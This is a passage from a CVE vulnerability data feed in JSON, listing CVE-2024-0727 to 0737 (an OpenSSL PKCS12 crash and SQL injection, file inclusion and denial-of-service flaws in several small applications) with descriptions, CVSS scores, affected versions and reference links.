"NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0727", "ASSIGNER" : "openssl-security@openssl.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/03/11/1", "name" : "http://www.openwall.com/lists/oss-security/2024/03/11/1", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2", "name" : "3.0.13 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2", "name" : "3.0.13 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a", "name" : "3.2.1 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a", "name" : "3.2.1 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c", "name" : "3.1.5 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c", "name" : "3.1.5 git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8", "name" : "1.1.1x git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8", "name" : "1.1.1x git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539", "name" : "1.0.2zj git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539", "name" : "1.0.2zj git commit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240208-0006/", "name" : "https://security.netapp.com/advisory/ntap-20240208-0006/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.openssl.org/news/secadv/20240125.txt", "name" : "OpenSSL Advisory", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.openssl.org/news/secadv/20240125.txt", "name" : "OpenSSL Advisory", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.0.2", "versionEndExcluding" : "1.0.2zj", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.1.1", "versionEndExcluding" : "1.1.1x", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0.0", "versionEndExcluding" : "3.0.13", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.1.0", "versionEndExcluding" : "3.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openssl:openssl:3.2.0:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-26T09:15Z", "lastModifiedDate" : "2025-05-29T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0728", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-610" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251551", "name" : "https://vuldb.com/?ctiid.251551", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251551", "name" : "https://vuldb.com/?ctiid.251551", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251551", "name" : "https://vuldb.com/?id.251551", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251551", "name" : "https://vuldb.com/?id.251551", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:foru_cms_project:foru_cms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2020-06-23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0729", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "name" : "https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251552", "name" : "https://vuldb.com/?ctiid.251552", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251552", "name" : "https://vuldb.com/?ctiid.251552", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251552", "name" : "https://vuldb.com/?id.251552", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251552", "name" : "https://vuldb.com/?id.251552", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:foru_cms_project:foru_cms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2020-06-23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0730", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e", "name" : "https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e", "name" : "https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251553", "name" : "https://vuldb.com/?ctiid.251553", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.251553", "name" : "https://vuldb.com/?ctiid.251553", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251553", "name" : "https://vuldb.com/?id.251553", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.251553", "name" : "https://vuldb.com/?id.251553", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:online_time_table_generator:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0731", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt", "name" : "https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt", "name" : "https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251554", "name" : "https://vuldb.com/?ctiid.251554", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251554", "name" : "https://vuldb.com/?ctiid.251554", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251554", "name" : "https://vuldb.com/?id.251554", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251554", "name" : "https://vuldb.com/?id.251554", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pcman_ftp_server_project:pcman_ftp_server:2.0.7:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T20:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0732", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt", "name" : "https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt", "name" : "https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251555", "name" : "https://vuldb.com/?ctiid.251555", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251555", "name" : "https://vuldb.com/?ctiid.251555", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251555", "name" : "https://vuldb.com/?id.251555", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251555", "name" : "https://vuldb.com/?id.251555", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pcman_ftp_server_project:pcman_ftp_server:2.0.7:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T20:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0733", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/3GznRo9vWRJ8", "name" : "https://note.zhaoj.in/share/3GznRo9vWRJ8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/3GznRo9vWRJ8", "name" : "https://note.zhaoj.in/share/3GznRo9vWRJ8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251556", "name" : "https://vuldb.com/?ctiid.251556", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251556", "name" : "https://vuldb.com/?ctiid.251556", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251556", "name" : "https://vuldb.com/?id.251556", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251556", "name" : "https://vuldb.com/?id.251556", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:smsot:smsot:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0734", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/vo1KOw3EYmBK", "name" : "https://note.zhaoj.in/share/vo1KOw3EYmBK", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/vo1KOw3EYmBK", "name" : "https://note.zhaoj.in/share/vo1KOw3EYmBK", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251557", "name" : "https://vuldb.com/?ctiid.251557", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251557", "name" : "https://vuldb.com/?ctiid.251557", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251557", "name" : "https://vuldb.com/?id.251557", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251557", "name" : "https://vuldb.com/?id.251557", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:smsot:smsot:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0735", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://blog.csdn.net/DMZNX/article/details/135683738", "name" : "https://blog.csdn.net/DMZNX/article/details/135683738", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://blog.csdn.net/DMZNX/article/details/135683738", "name" : "https://blog.csdn.net/DMZNX/article/details/135683738", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251558", "name" : "https://vuldb.com/?ctiid.251558", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251558", "name" : "https://vuldb.com/?ctiid.251558", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251558", "name" : "https://vuldb.com/?id.251558", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251558", "name" : "https://vuldb.com/?id.251558", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:online_tours_\\&_travels_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0736", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://0day.today/exploit/39249", "name" : "https://0day.today/exploit/39249", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://0day.today/exploit/39249", "name" : "https://0day.today/exploit/39249", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251559", "name" : "https://vuldb.com/?ctiid.251559", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251559", "name" : "https://vuldb.com/?ctiid.251559", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251559", "name" : "https://vuldb.com/?id.251559", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251559", "name" : "https://vuldb.com/?id.251559", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:easy_file_sharing_ftp_server_project:easy_file_sharing_ftp_server:3.6:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0737", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251560", "name" : "https://vuldb.com/?ctiid.251560", "refsource" : "", "tags" : [ "Permissions 